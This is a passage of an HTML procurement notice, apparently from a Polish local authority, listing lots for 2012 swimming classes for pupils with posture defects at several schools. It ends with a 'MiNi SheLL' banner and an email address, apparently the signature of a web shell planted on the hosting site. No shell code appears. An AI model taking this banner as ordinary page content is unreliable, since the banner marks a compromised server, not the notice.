<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć  na basenie dla uczniów z wadami postawy z Zespołu Szkolno - Przedszkolnego w Libuszy dla grupy I w wymiarze 30 godzin w miesiącach III-VI i dla grupy II w wymiarze 30 godzin                             w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Prowadzenie zajęć  na basenie dla uczniów z wadami postawy z Zespołu  Szkół  nr 1 w Bieczu dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI i dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć  na basenie dla uczniów z wadami postawy z Zespołu  Szkół  nr 1 w Bieczu dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI i dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Prowadzenie zajęć  na basenie dla uczniów z wadami postawy z Zespołu Szkolno - Przedszkolnego w Korczynie dla grupy I w wymiarze 20 godzin w miesiącach III-VI i dla grupy I w wymiarze 17 godzin                     w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć  na basenie dla uczniów z wadami postawy z Zespołu Szkolno - Przedszkolnego w Korczynie dla grupy I w wymiarze 20 godzin w miesiącach III-VI i dla grupy I w wymiarze 17 godzin                     w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Prowadzenie zajęć zajęć  na basenie dla uczniów z wadami postawy ze Szkoły Podstawowej w Sitnicy dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI i dla grupy I II w łącznym wymiarze 30 godzin  w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć zajęć  na basenie dla uczniów z wadami postawy ze Szkoły Podstawowej w Sitnicy dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI i dla grupy I II w łącznym wymiarze 30 godzin  w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com